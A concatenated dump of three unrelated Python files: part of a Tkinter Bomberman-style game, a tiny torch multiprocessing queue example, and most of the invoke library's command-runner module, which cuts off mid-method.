img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play24.gif'))
else:
if self.outro == None:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play24.gif'))
else:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play14.gif'))
self.img.configure(image=img2)
self.img.image = img2
self.lastx=self.img.winfo_x()-32
self.lasty=self.img.winfo_y()
self.img.place(x=self.img.winfo_x()-32,y=self.img.winfo_y())
t1 = threading.Thread(target=self.morreu, args=[testando])
t1.start()
self.master.update()
def direita(self,event):
testando = self.checaposicao(self.img.winfo_x()+32,self.img.winfo_y(),"y")
if testando == True:
if event != "direita":
self.master.cli.enviar("011")
if self.play == "primeiro":
if self.outro == None:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play12.gif'))
else:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play22.gif'))
else:
if self.outro == None:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play22.gif'))
else:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play12.gif'))
self.img.configure(image=img2)
self.img.image = img2
self.lastx=self.img.winfo_x()+32
self.lasty=self.img.winfo_y()
self.img.place(x=self.img.winfo_x()+32,y=self.img.winfo_y())
elif testando == "morreu1" or testando == "morreu2":
if event != "direita":
self.master.cli.enviar("011")
if self.play == "primeiro":
if self.outro == None:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play12.gif'))
else:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play22.gif'))
else:
if self.outro == None:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play22.gif'))
else:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play12.gif'))
self.img.configure(image=img2)
self.img.image = img2
self.lastx=self.img.winfo_x()+32
self.lasty=self.img.winfo_y()
self.img.place(x=self.img.winfo_x()+32,y=self.img.winfo_y())
t1 = threading.Thread(target=self.morreu, args=[testando])
t1.start()
self.master.update()
def bomba(self,event):
if self.testabomba == 1:
if event != "bomba":
self.master.cli.enviar("100")
t1 = Thread(target=self.bomba2)
t1.start()
def bomba2(self):
self.testabomba=0
self.img2 = ImageTk.PhotoImage(Image.open('/usr/bin/bomba.gif'))
self.img3 = Label(self.master,bg='green',image=self.img2)
self.img3.image=self.img2
self.img3.place(x=self.lastx,y=self.lasty)
lastx = self.lastx
lasty = self.lasty
self.master.update()
teste = lastx / 32
teste2 = lasty / 32
self.master.blocos.append((teste,teste2))
time.sleep(2)
self.master.fogo.append(self.master._widgets[teste2][teste])
self.master._widgets[teste2][teste].configure(bg="red")
veri=True
if (lastx+32) <= 416:
for x in range(32,417,64):
for y in range(64,417,64):
if lastx == x and lasty == y:
veri=False
if veri:
self.master.fogo.append(self.master._widgets[teste2][teste+1])
self.master._widgets[teste2][teste+1].configure(bg="red")
else:
veri=False
veri2=True
if (lastx-32) >= 32:
for x in range(32,417,64):
for y in range(64,417,64):
if lastx == x and lasty == y:
veri2=False
if veri2:
self.master.fogo.append(self.master._widgets[teste2][teste-1])
self.master._widgets[teste2][teste-1].configure(bg="red")
else:
veri2=False
veri3=True
if (lasty+32) <= 416:
for x in range(64,417,64):
for y in range(32,417,64):
if lastx == x and lasty == y:
veri3=False
if veri3:
self.master.fogo.append(self.master._widgets[teste2+1][teste])
self.master._widgets[teste2+1][teste].configure(bg="red")
else:
veri3=False
veri4=True
if (lasty-32) >= 32:
for x in range(64,417,64):
for y in range(32,417,64):
if lastx == x and lasty == y:
veri4=False
if veri4:
self.master.fogo.append(self.master._widgets[teste2-1][teste])
self.master._widgets[teste2-1][teste].configure(bg="red")
else:
veri4=False
self.img3.destroy()
self.testabomba=1
try:
self.master.blocos.remove((teste,teste2))
except:
pass
try:
self.master.blocos.remove((teste+1,teste2))
except:
pass
try:
self.master.blocos.remove((teste-1,teste2))
except:
pass
try:
self.master.blocos.remove((teste,teste2+1))
except:
pass
try:
self.master.blocos.remove((teste,teste2-1))
except:
pass
try:
testando=self.master.play1.checaposicao(self.master.play1.lastx,self.master.play1.lasty,"parado")
if testando == "morreu1" or testando == "morreu2":
t1 = threading.Thread(target=self.morreu, args=[testando])
t1.start()
except:
pass
try:
testando=self.master.play2.checaposicao(self.master.play2.lastx,self.master.play2.lasty,"parado")
if testando == "morreu1" or testando == "morreu2":
t1 = threading.Thread(target=self.morreu, args=[testando])
t1.start()
except:
pass
#self.checaposicao(self.lastx,self.lasty, "parado")
time.sleep(1)
if veri:
self.master.fogo.remove(self.master._widgets[teste2][teste+1])
self.master._widgets[teste2][teste+1].configure(bg="green")
if veri2:
self.master.fogo.remove(self.master._widgets[teste2][teste-1])
self.master._widgets[teste2][teste-1].configure(bg="green")
if veri3:
self.master.fogo.remove(self.master._widgets[teste2+1][teste])
self.master._widgets[teste2+1][teste].configure(bg="green")
if veri4:
self.master.fogo.remove(self.master._widgets[teste2-1][teste])
self.master._widgets[teste2-1][teste].configure(bg="green")
self.master.fogo.remove(self.master._widgets[teste2][teste])
self.master._widgets[teste2][teste].configure(bg="green")
return True
def checaposicao(self, x, y, caminho):
#print self.blocos
#print self.master.sou,x,y, caminho
if x < 32 or y > 416 or x > 416 or y < 32:
return False
elif x >= 32 and y >= 32:
for xy in self.master.blocos:
#print x,y
if x > (xy[0]-1) * 32 and x < (xy[0]+1) * 32 and y > (xy[1]-1)*32 and y < (xy[1]+1)*32:
return False
teste,teste2 = self.master.grid_location(x,y)
if caminho == "x":
for i in range(32,417,64):
if x == i:
if self.master._widgets[teste2+1][teste+1] in self.master.fogo:
#self.img.destroy()
if self.master.sou == "primeiro" and self.outro == None:
return "morreu1"
elif self.master.sou == "segundo" and self.outro != None:
return "morreu1"
else:
return "morreu2"
return True
elif caminho == "y":
for i in range(32,417,64):
if y == i:
if self.master._widgets[teste2+1][teste+1] in self.master.fogo:
#self.img.destroy()
if self.master.sou == "primeiro" and self.outro == None:
return "morreu1"
elif self.master.sou == "segundo" and self.outro != None:
return "morreu1"
else:
return "morreu2"
return True
elif caminho == "parado":
if self.master._widgets[teste2+1][teste+1] in self.master.fogo:
#self.img.destroy()
if self.master.sou == "primeiro" and self.outro == None:
return "morreu1"
elif self.master.sou == "segundo" and self.outro != None:
return "morreu1"
else:
return "morreu2"
else:
return True
|
d_mp_test_2.py
|
from torch.multiprocessing import Queue, Process
def proc_a(queue):
data = 1000
queue.put(data)
def proc_b(queue):
data = queue.get()
print(data)
if __name__ == '__main__':
# b = [(1, 2), (20, 30), (200, 300)]
# print(list(zip(*b)))
queue = Queue()
p1 = Process(target=proc_a, args=(queue,))
p2 = Process(target=proc_b, args=(queue,))
p1.start()
p2.start()
p1.join()
p2.join()
|
runners.py
|
# -*- coding: utf-8 -*-
import locale
import os
import struct
from subprocess import Popen, PIPE
import sys
import threading
import time
# Import some platform-specific things at top level so they can be mocked for
# tests.
try:
import pty
except ImportError:
pty = None
try:
import fcntl
except ImportError:
fcntl = None
try:
import termios
except ImportError:
termios = None
from .exceptions import (
UnexpectedExit, Failure, ThreadException, WatcherError,
)
from .platform import (
WINDOWS, pty_size, character_buffered, ready_for_reading, bytes_to_read,
)
from .util import has_fileno, isatty, ExceptionHandlingThread
try:
from .vendor import six
except ImportError:
import six
class Runner(object):
"""
Partially-abstract core command-running API.
This class is not usable by itself and must be subclassed, implementing a
number of methods such as `start`, `wait` and `returncode`. For a subclass
implementation example, see the source code for `.Local`.
"""
read_chunk_size = 1000
input_sleep = 0.01
def __init__(self, context):
"""
Create a new runner with a handle on some `.Context`.
:param context:
a `.Context` instance, used to transmit default options and provide
access to other contextualized information (e.g. a remote-oriented
`.Runner` might want a `.Context` subclass holding info about
hostnames and ports.)
.. note::
The `.Context` given to `.Runner` instances **must** contain
default config values for the `.Runner` class in question. At a
minimum, this means values for each of the default
`.Runner.run` keyword arguments such as ``echo`` and ``warn``.
:raises exceptions.ValueError:
if not all expected default values are found in ``context``.
"""
#: The `.Context` given to the same-named argument of `__init__`.
self.context = context
#: A `threading.Event` signaling program completion.
#:
#: Typically set after `wait` returns. Some IO mechanisms rely on this
#: to know when to exit an infinite read loop.
self.program_finished = threading.Event()
# I wish Sphinx would organize all class/instance attrs in the same
# place. If I don't do this here, it goes 'class vars -> __init__
# docstring -> instance vars' :( TODO: consider just merging class and
# __init__ docstrings, though that's annoying too.
#: How many bytes (at maximum) to read per iteration of stream reads.
self.read_chunk_size = self.__class__.read_chunk_size
# Ditto re: declaring this in 2 places for doc reasons.
#: How many seconds to sleep on each iteration of the stdin read loop
#: and other otherwise-fast loops.
self.input_sleep = self.__class__.input_sleep
#: Whether pty fallback warning has been emitted.
self.warned_about_pty_fallback = False
#: A list of `.StreamWatcher` instances for use by `respond`. Is filled
#: in at runtime by `run`.
self.watchers = []
def run(self, command, **kwargs):
"""
Execute ``command``, returning an instance of `Result`.
.. note::
All kwargs will default to the values found in this instance's
`~.Runner.context` attribute, specifically in its configuration's
``run`` subtree (e.g. ``run.echo`` provides the default value for
the ``echo`` keyword, etc). The base default values are described
in the parameter list below.
:param str command: The shell command to execute.
:param str shell: Which shell binary to use. Default: ``/bin/bash``.
:param bool warn:
Whether to warn and continue, instead of raising
`.UnexpectedExit`, when the executed command exits with a
nonzero status. Default: ``False``.
.. note::
This setting has no effect on exceptions, which will still be
raised, typically bundled in `.ThreadException` objects if they
were raised by the IO worker threads.
Similarly, `.WatcherError` exceptions raised by
`.StreamWatcher` instances will also ignore this setting, and
will usually be bundled inside `.Failure` objects (in order to
preserve the execution context).
:param hide:
Allows the caller to disable ``run``'s default behavior of copying
the subprocess' stdout and stderr to the controlling terminal.
Specify ``hide='out'`` (or ``'stdout'``) to hide only the stdout
stream, ``hide='err'`` (or ``'stderr'``) to hide only stderr, or
``hide='both'`` (or ``True``) to hide both streams.
The default value is ``None``, meaning to print everything;
``False`` will also disable hiding.
.. note::
Stdout and stderr are always captured and stored in the
``Result`` object, regardless of ``hide``'s value.
.. note::
``hide=True`` will also override ``echo=True`` if both are
given (either as kwargs or via config/CLI).
:param bool pty:
By default, ``run`` connects directly to the invoked process and
reads its stdout/stderr streams. Some programs will buffer (or even
behave) differently in this situation compared to using an actual
terminal or pseudoterminal (pty). To use a pty instead of the
default behavior, specify ``pty=True``.
.. warning::
Due to their nature, ptys have a single output stream, so the
ability to tell stdout apart from stderr is **not possible**
when ``pty=True``. As such, all output will appear on
``out_stream`` (see below) and be captured into the ``stdout``
result attribute. ``err_stream`` and ``stderr`` will always be
empty when ``pty=True``.
:param bool fallback:
Controls auto-fallback behavior re: problems offering a pty when
``pty=True``. Whether this has any effect depends on the specific
`Runner` subclass being invoked. Default: ``True``.
:param bool echo:
Controls whether `.run` prints the command string to local stdout
prior to executing it. Default: ``False``.
.. note::
``hide=True`` will override ``echo=True`` if both are given.
:param dict env:
By default, subprocesses recieve a copy of Invoke's own environment
(i.e. ``os.environ``). Supply a dict here to update that child
environment.
For example, ``run('command', env={'PYTHONPATH':
'/some/virtual/env/maybe'})`` would modify the ``PYTHONPATH`` env
var, with the rest of the child's env looking identical to the
parent.
.. seealso:: ``replace_env`` for changing 'update' to 'replace'.
:param bool replace_env:
When ``True``, causes the subprocess to receive the dictionary
given to ``env`` as its entire shell environment, instead of
updating a copy of ``os.environ`` (which is the default behavior).
Default: ``False``.
:param str encoding:
Override auto-detection of which encoding the subprocess is using
for its stdout/stderr streams (which defaults to the return value
of `default_encoding`).
:param out_stream:
A file-like stream object to which the subprocess' standard output
should be written. If ``None`` (the default), ``sys.stdout`` will
be used.
:param err_stream:
Same as ``out_stream``, except for standard error, and defaulting
to ``sys.stderr``.
:param in_stream:
A file-like stream object to used as the subprocess' standard
input. If ``None`` (the default), ``sys.stdin`` will be used.
:param list watchers:
A list of `.StreamWatcher` instances which will be used to scan the
program's ``stdout`` or ``stderr`` and may write into its ``stdin``
(typically ``str`` or ``bytes`` objects depending on Python
version) in response to patterns or other heuristics.
See :doc:`/concepts/watchers` for details on this functionality.
Default: ``[]``.
:param bool echo_stdin:
Whether to write data from ``in_stream`` back to ``out_stream``.
In other words, in normal interactive usage, this parameter
controls whether Invoke mirrors what you type back to your
terminal.
By default (when ``None``), this behavior is triggered by the
following:
* Not using a pty to run the subcommand (i.e. ``pty=False``),
as ptys natively echo stdin to stdout on their own;
* And when the controlling terminal of Invoke itself (as per
``in_stream``) appears to be a valid terminal device or TTY.
(Specifically, when `~invoke.util.isatty` yields a ``True``
result when given ``in_stream``.)
.. note::
This property tends to be ``False`` when piping another
program's output into an Invoke session, or when running
Invoke within another program (e.g. running Invoke from
itself).
If both of those properties are true, echoing will occur; if either
is false, no echoing will be performed.
When not ``None``, this parameter will override that auto-detection
and force, or disable, echoing.
:returns:
`Result`, or a subclass thereof.
:raises:
`.UnexpectedExit`, if the command exited nonzero and
``warn`` was ``False``.
:raises:
`.Failure`, if the command didn't even exit cleanly, e.g. if a
`.StreamWatcher` raised `.WatcherError`.
:raises:
`.ThreadException` (if the background I/O threads encountered
exceptions other than `.WatcherError`).
"""
try:
return self._run_body(command, **kwargs)
finally:
self.stop()
def _run_body(self, command, **kwargs):
# Normalize kwargs w/ config
opts, out_stream, err_stream, in_stream = self._run_opts(kwargs)
shell = opts['shell']
# Environment setup
env = self.generate_env(opts['env'], opts['replace_env'])
# Echo running command
if opts['echo']:
print("\033[1;37m{0}\033[0m".format(command))
# Start executing the actual command (runs in background)
self.start(command, shell, env)
# Arrive at final encoding if neither config nor kwargs had one
self.encoding = opts['encoding'] or self.default_encoding()
# Set up IO thread parameters (format - body_func: {kwargs})
stdout, stderr = [], []
thread_args = {
self.handle_stdout: {
'buffer_': stdout,
'hide': 'stdout' in opts['hide'],
'output': out_stream,
},
# TODO: make this & related functionality optional, for users who
# don't care about autoresponding & are encountering issues with
# the stdin mirroring? Downside is it fragments expected behavior &
# puts folks with true interactive use cases in a different support
# class.
self.handle_stdin: {
'input_': in_stream,
'output': out_stream,
'echo': opts['echo_stdin'],
}
}
if not self.using_pty:
thread_args[self.handle_stderr] = {
'buffer_': stderr,
'hide': 'stderr' in opts['hide'],
'output': err_stream,
}
# Kick off IO threads
self.threads = {}
exceptions = []
for target, kwargs in six.iteritems(thread_args):
t = ExceptionHandlingThread(target=target, kwargs=kwargs)
self.threads[target] = t
t.start()
# Wait for completion, then tie things off & obtain result
# And make sure we perform that tying off even if things asplode.
exception = None
while True:
try:
self.wait()
break # done waiting!
# NOTE: we handle all this now instead of at
# actual-exception-handling time because otherwise the stdout/err
# reader threads may block until the subprocess exits.
# TODO: honor other signals sent to our own process and transmit
# them to the subprocess before handling 'normally'.
except KeyboardInterrupt as e:
self.send_interrupt(e)
# NOTE: no break; we want to return to self.wait()
except BaseException as e: # Want to handle SystemExit etc still
# Store exception for post-shutdown reraise
exception = e
# Break out of return-to-wait() loop - we want to shut down
break
# Inform stdin-mirroring worker to stop its eternal looping
self.program_finished.set()
# Join threads, setting a timeout if necessary
for target, thread in six.iteritems(self.threads):
thread.join(self._thread_timeout(target))
e = thread.exception()
if e is not None:
exceptions.append(e)
# If we got a main-thread exception while wait()ing, raise it now that
# we've closed our worker threads.
if exception is not None:
raise exception
# Strip out WatcherError from any thread exceptions; they are bundled
# into Failure handling at the end.
watcher_errors = []
thread_exceptions = []
for exception in exceptions:
real = exception.value
if isinstance(real, WatcherError):
watcher_errors.append(real)
else:
thread_exceptions.append(exception)
# If any exceptions appeared inside the threads, raise them now as an
# aggregate exception object.
if thread_exceptions:
raise ThreadException(thread_exceptions)
# At this point, we had enough success that we want to be returning or
# raising detailed info about our execution; so we generate a Result.
stdout = ''.join(stdout)
stderr = ''.join(stderr)
if WINDOWS:
# "Universal newlines" - replace all standard forms of
# newline with \n. This is not technically Windows related
# (\r as newline is an old Mac convention) but we only apply
# the translation for Windows as that's the only platform
# it is likely to matter for these days.
stdout = stdout.replace("\r\n", "\n").replace("\r", "\n")
stderr = stderr.replace("\r\n", "\n").replace("\r", "\n")
# Get return/exit code, unless there were WatcherErrors to handle.
# NOTE: In that case, returncode() may block waiting on the process
# (which may be waiting for user input). Since most WatcherError
# situations lack a useful exit code anyways, skipping this doesn't
# really hurt any.
exited = None if watcher_errors else self.returncode()
# Obtain actual result
result = self.generate_result(
command=command,
shell=shell,
env=env,
stdout=stdout,
stderr=stderr,
exited=exited,
pty=self.using_pty,
hide=opts['hide'],
)
# Any presence of WatcherError from the threads indicates a watcher was
# upset and aborted execution; make a generic Failure out of it and
# raise that.
if watcher_errors:
# TODO: ambiguity exists if we somehow get WatcherError in *both*
# threads...as unlikely as that would normally be.
raise Failure(result, reason=watcher_errors[0])
if not (result or opts['warn']):
raise UnexpectedExit(result)
return result
def _run_opts(self, kwargs):
"""
Unify `run` kwargs with config options to arrive at local options.
:returns:
Four-tuple of ``(opts_dict, stdout_stream, stderr_stream,
stdin_stream)``.
"""
opts = {}
for key, value in six.iteritems(self.context.config.run):
runtime = kwargs.pop(key, None)
opts[key] = value if runtime is None else runtime
# Handle invalid kwarg keys (anything left in kwargs).
# Act like a normal function would, i.e. TypeError
if kwargs:
err = "run() got an unexpected keyword argument '{0}'"
raise TypeError(err.format(list(kwargs.keys())[0]))
# If hide was True, turn off echoing
if opts['hide'] is True:
opts['echo'] = False
# Then normalize 'hide' from one of the various valid input values,
# into a stream-names tuple.
opts['hide'] = normalize_hide(opts['hide'])
# Derive stream objects
out_stream = opts['out_stream']
if out_stream is None:
out_stream = sys.stdout
err_stream = opts['err_stream']
if err_stream is None:
err_stream = sys.stderr
in_stream = opts['in_stream']
if in_stream is None:
in_stream = sys.stdin
# Determine pty or no
self.using_pty = self.should_use_pty(opts['pty'], opts['fallback'])
if opts['watchers']:
self.watchers = opts['watchers']
return opts, out_stream, err_stream, in_stream
def _thread_timeout(self, target):
# Add a timeout to out/err thread joins when it looks like they're not
# dead but their counterpart is dead; this indicates issue #351 (fixed
# by #432) where the subproc may hang because its stdout (or stderr) is
# no longer being consumed by the dead thread (and a pipe is filling
# up.) In that case, the non-dead thread is likely to block forever on
# a `recv` unless we add this timeout.
if target == self.handle_stdin:
return None
opposite = self.handle_stderr
if target == self.handle_stderr:
opposite = self.handle_stdout
if opposite in self.threads and self.threads[opposite].is_dead:
return 1
return None
def generate_result(self, **kwargs):
"""
Create & return a suitable `Result` instance from the given ``kwargs``.
Subclasses may wish to override this in order to manipulate things or
generate a `Result` subclass (e.g. ones containing additional metadata
besides the default).
"""
return Result(**kwargs)
def read_proc_output(self, reader):
"""
Iteratively read & decode bytes from a subprocess' out/err stream.
:param reader:
A literal reader function/partial, wrapping the actual stream
object in question, which takes a number of bytes to read, and
returns that many bytes (or ``None``).
``reader`` should be a reference to either `read_proc_stdout` or
`read_proc_stderr`, which perform the actual, platform/library
specific read calls.
:returns:
A generator yielding Unicode strings (`unicode` on Python 2; `str`
on Python 3).
Specifically, each resulting string is the result of decoding
`read_chunk_size` bytes read from the subprocess' out/err stream.
"""
# NOTE: Typically, reading from any stdout/err (local, remote or
# otherwise) can be thought of as "read until you get nothing back".
# This is preferable over "wait until an out-of-band signal claims the
# process is done running" because sometimes that signal will appear
# before we've actually read all the data in the stream (i.e.: a race
# condition).
while True:
data = reader(self.read_chunk_size)
if not data:
break
yield self.decode(data)
def write_our_output(self, stream, string):
"""
Write ``string`` to ``stream``.
Also calls ``.flush()`` on ``stream`` to ensure that real terminal
streams don't buffer.
:param stream:
A file-like stream object, mapping to the ``out_stream`` or
``err_stream`` parameters of `run`.
:param string: A Unicode string object.
:returns: ``None``.
"""
# Encode under Python 2 only, because of the common problem where
# sys.stdout/err on Python 2 end up using sys.getdefaultencoding(),
# which is frequently NOT the same thing as the real local terminal
# encoding (reflected as sys.stdout.encoding). I.e. even when
# sys.stdout.encoding is UTF-8, ascii is still actually used, and
# explodes.
# Python 3 doesn't have this problem, so we delegate encoding to the
# io.*Writer classes involved.
if six.PY2:
# TODO: split up self.encoding, only use the one for 'local
# encoding' here.
string = string.encode(self.encoding)
stream.write(string)
stream.flush()
def _handle_output(self, buffer_, hide, output, reader):
# TODO: store un-decoded/raw bytes somewhere as well...
for data in self.read_proc_output(reader):
# Echo to local stdout if necessary
# TODO: should we rephrase this as "if you want to hide, give me a
# dummy output stream, e.g. something like /dev/null"? Otherwise, a
# combo of 'hide=stdout' + 'here is an explicit out_stream' means
# out_stream is never written to, and that seems...odd.
if not hide:
self.write_our_output(stream=output, string=data)
# Store in shared buffer so main thread can do things with the
# result after execution completes.
# NOTE: this is threadsafe insofar as no reading occurs until after
# the thread is join()'d.
buffer_.append(data)
# Run our specific buffer through the autoresponder framework
self.respond(buffer_)
def handle_stdout(self, buffer_, hide, output):
"""
Read process' stdout, storing into a buffer & printing/parsing.
Intended for use as a thread target. Only terminates when all stdout
from the subprocess has been read.
:param list buffer_: The capture buffer shared with the main thread.
:param bool hide: Whether or not to replay data into ``output``.
:param output:
Output stream (file-like object) to write data into when not
hiding.
:returns: ``None``.
"""
self._handle_output(
buffer_,
hide,
output,
reader=self.read_proc_stdout,
)
def handle_stderr(self, buffer_, hide, output):
"""
Read process' stderr, storing into a buffer & printing/parsing.
Identical to `handle_stdout` except for the stream read from; see its
docstring for API details.
"""
self._handle_output(
buffer_,
hide,
output,
reader=self.read_proc_stderr,
)
def read_our_stdin(self, input_):
"""
Read & decode bytes from a local stdin stream.
:param input_:
Actual stream object to read from. Maps to ``in_stream`` in `run`,
so will often be ``sys.stdin``, but might be any stream-like
object.
:returns:
A Unicode string, the result of decoding the read bytes (this might
be the empty string if the pipe has closed/reached EOF); or
``None`` if stdin wasn't ready for reading yet.
"""
# TODO: consider moving the character_buffered contextmanager call in
# here? Downside is it would be flipping those switches for every byte
# read instead of once per session, which could be costly (?).
bytes_ = None
if ready_for_reading(input_):
bytes_ = input_.read(bytes_to_read(input_))
# Decode if it appears to be binary-type. (From real terminal
# streams, usually yes; from file-like objects, often no.)
if bytes_ and isinstance(bytes_, six.binary_type):
# TODO: will decoding 1 byte at a time break multibyte
# character encodings? How to square interactivity with that?
bytes_ = self.decode(bytes_)
return bytes_
def handle_stdin(self, input_, output, echo):
"""
Read local stdin, copying into process' stdin as necessary.
Intended for use as a thread target.
.. note::
Because real terminal stdin streams have no well-defined "end", if
such a stream is detected (based on existence of a callable
``.fileno()``) this method will wait until `program_finished` is
set, before terminating.
When the stream doesn't appear to be from a terminal, the same
semantics as `handle_stdout` are used - the stream is simply
``read()`` from until it returns an empty value.
:param input_: Stream (file-like object) from which to read.
:param output: Stream (file-like object) to which echoing may occur.
:param bool echo: User override option for stdin-stdout echoing.
:returns: ``None``.
"""
# TODO: reinstate lock/whatever thread logic from fab v1 which prevents
# reading from stdin while other parts of the code are prompting for
# runtime passwords? (search for 'input_enabled')
# TODO: fabric#1339 is strongly related to this, if it's not literally
# exposing some regression in Fabric 1.x itself.
with character_buffered(input_):
while True:
data = self.read_our_stdin(input_)
if data:
# Mirror what we just read to process' stdin.
# We perform an encode so Python 3 gets bytes (streams +
# str's in Python 3 == no bueno) but skip the decode step,
# since there's presumably no need (nobody's interacting
# with this data programmatically).
self.write_proc_stdin(data)
# Also echo it back to local stdout (or whatever
# out_stream is set to) when necessary.
if echo is None:
echo = self.should_echo_stdin(input_, output)
if echo:
self.write_our_output(stream=output, string=data)
# Empty string/char/byte != None. Can't just use 'else' here.
elif data is not None:
# When reading from file-like objects that aren't "real"
# terminal streams, an empty byte signals EOF.
break
# Dual all-done signals: program being executed is done
# running, *and* we don't seem to be reading anything out of
# stdin. (NOTE: If we only test the former, we may encounter
# race conditions re: unread stdin.)
if self.program_finished.is_set() and not data:
break
# Take a nap so we're not chewing CPU.
time.sleep(self.input_sleep)
def should_echo_stdin(self, input_, output):
"""
Determine whether data read from ``input_`` should echo to ``output``.
Used by `handle_stdin`; tests attributes of ``input_`` and ``output``.
:param input_: Input stream (file-like object).
:param output: Output stream (file-like object).
:returns: A ``bool``.
"""
return (not self.using_pty) and isatty(input_)
def respond(self, buffer_):
"""
Write to the program's stdin in response to patterns in ``buffer_``.
The patterns and responses are driven by the `.StreamWatcher` instances
from the ``watchers`` kwarg of `run` - see :doc:`/concepts/watchers`
for a conceptual overview.
:param list buffer:
The capture buffer for this thread's particular IO stream.
:returns: ``None``.
"""
# Join buffer contents into a single string; without this,
# StreamWatcher subclasses can't do things like iteratively scan for
# pattern matches.
# NOTE: using string.join should be "efficient enough" for now, re:
# speed and memory use. Should that become false, consider using
# StringIO or cStringIO (tho the latter doesn't do Unicode well?) which
# is apparently even more efficient.
stream = u''.join(buffer_)
for watcher in self.watchers:
for response in watcher.submit(stream):
self.write_proc_stdin(response)
def generate_env(self, env, replace_env):
"""
Return a suitable environment dict based on user input & behavior.
:param dict env: Dict supplying overrides or full env, depending.
:param bool replace_env:
Whether ``env`` updates, or is used in place of, the value of
`os.environ`.
:returns: A dictionary of shell environment vars.
"""
return env if replace_env else dict(os.environ, **env)
def should_use_pty(self, pty, fallback):
"""
Should execution attempt to use a pseudo-terminal?
:param bool pty:
Whether the user explicitly asked for a pty.
:param bool fallback:
Whether falling back to non-pty execution should be allowed, in
situations where ``pty=True`` but a pty could not be allocated.
"""
# NOTE: fallback not used: no falling back implemented by default.
return pty
@property
def has_dead_threads(self):
"""
Detect whether any IO threads appear to have terminated unexpectedly.
Used during process-completion waiting (in `wait`) to ensure we don't
deadlock our child process if our IO processing threads have
errored/died.
:returns:
``True`` if any threads appear to have terminated with an
exception, ``False`` otherwise.
"""
return any(x.is_dead for x in self.threads.values())
def wait(self):
"""
Block until the running command appears to have exited.
:returns: ``None``.
"""
while True:
proc_finished = self.process_is_finished
dead_threads = self.has_dead_threads
if proc_finished or dead_threads:
break
time.sleep(self.input_sleep)
def write_proc_stdin(self, data):
"""
Write encoded ``data`` to the running process' stdin.
:param data: A Unicode string.
:returns: ``None``.
"""
# Encode always, then request implementing subclass to perform the
# actual write to subprocess' stdin.
self._write_proc_stdin(data.encode(self.encoding))
def decode(self, data):
"""
Decode some ``data`` bytes, returning Unicode.
"""
# NOTE: yes, this is a 1-liner. The point is to make it much harder to
# forget to use 'replace' when decoding :)
return data.decode(self.encoding, 'replace')
@property
def process_is_finished(self):
"""
Determine whether our subprocess has terminated.
.. note::
The implementation of this method should be nonblocking, as it is
used within a query/poll loop.
:returns:
``True`` if the subprocess has finished running, ``False``
otherwise.
"""
raise NotImplementedError
def start(self, command, shell, env):
"""
Initiate execution of ``command`` (via ``shell``, with ``env``).
Typically this means use of a forked subprocess or requesting start of
execution on a remote system.
In most cases, this method will also set subclass-specific member
variables used in other methods such as `wait` and/or `returncode`.
"""
raise NotImplementedError
def read_proc_stdout(self, num_bytes):
"""
Read ``num_bytes`` from the running process' stdout stream.
:param int num_bytes: Number of bytes to read at maximum.
:returns: A string/bytes object.
"""
raise NotImplementedError
def read_proc_stderr(self, num_bytes):
"""
Read ``num_bytes`` from the running process' stderr stream.
:param int num_bytes: Number of bytes to read at maximum.
:returns: A string/bytes object.
"""
raise NotImplementedError
def _write_proc_stdin(self, data):
"""
Write ``data`` to running process' stdin.
This should never be called directly; it's for subclasses to implement.
See `write_proc_stdin` for the public API call.
:param data: Already-encoded byte data suitable for writing.
:returns: ``None``.
"""
raise NotImplementedError
def default_encoding(self):
"""
Return a string naming the expected encoding of subprocess streams.
This return value should be suitable for use by encode/decode methods.
"""
# TODO: probably wants to be 2 methods, one for local and one for
# subprocess. For now, good enough to assume both are the same.
#
# Based on some experiments there is an issue with
# `locale.getpreferredencoding(do_setlocale=False)` in Python 2.x on
# Linux and OS X, and `locale.getpreferredencoding(do_setlocale=True)`
# triggers some global state changes. (See #274 for discussion.)
encoding = locale.getpreferredencoding(False)
if six.PY2 and not WINDOWS:
default = locale.getdefaultlocale()[1]
if default is not None:
encoding = default
return encoding
def send_interrupt(self, interrupt):
"""
Submit an interrupt signal to the running subprocess.
In almost all implementations, the default behavior is what will be
desired: submit ``\x03`` to the subprocess' stdin pipe. However, we
leave this as a public method in case this default needs to be
augmented or replaced.
:param interrupt:
The locally-sourced ``KeyboardInterrupt`` causing the method call.
:returns: ``None``.
"""
self.write_proc_stdin(u'\x03')
def returncode(self):
"""
Return the numeric return/exit code resulting from command execution.
:returns: `int`
"""
raise NotImplementedError
def stop(self):
"""
Perform final cleanup, if necessary.
This method is called within a ``finally`` clause inside the main `run`
method. Depending on the subclass, it may be a no-op, or it may do
things such as close network connections or open files.
:returns: ``None``
"""
raise NotImplementedError
class Local(Runner):
"""
Execute a command on the local system in a subprocess.
.. note::
When Invoke itself is executed without a controlling terminal (e.g.
when ``sys.stdin`` lacks a useful ``fileno``), it's not possible to
present a handle on our PTY to local subprocesses. In such situations,
`Local` will fallback to behaving as if ``pty=False`` (on the theory
that degraded execution is better than none at all) as well as printing
a warning to stderr.
To disable this behavior, say ``fallback=False``.
"""
def __init__(self, context):
super(Local, self).__init__(context)
# Bookkeeping var for pty use case
self.status = None
def should_use_pty(self, pty=False, fallback=True):
use_pty = False
if pty:
use_pty = True
# TODO: pass in & test in_stream, not sys.stdin
if not has_fileno(sys.stdin) and fallback:
if not self.warned_about_pty_fallback:
sys.stderr.write("WARNING: stdin has no fileno; falling back to non-pty execution!\n") # noqa
self.warned_about_pty_fallback = True
use_pty = False
return use_pty
def read_proc_stdout(self, num_bytes):
# Obtain useful read-some-bytes function
if self.using_pty:
# Need to handle spurious OSErrors on some Linux platforms.
try:
data = os.read(self.parent_fd, num_bytes)
except OSError as e:
# Only eat this specific OSError so we don't hide others
if "Input/output error" not in str(e):
raise
# The bad OSErrors happen after all expected output has
# appeared, so we return a falsey value, which triggers the
# "end of output" logic in code using reader functions.
data = None
else:
data = os.read(self.process.stdout.fileno(), num_bytes)
return data
def read_proc_stderr(self, num_bytes):
# NOTE: when using a pty, this will never be called.
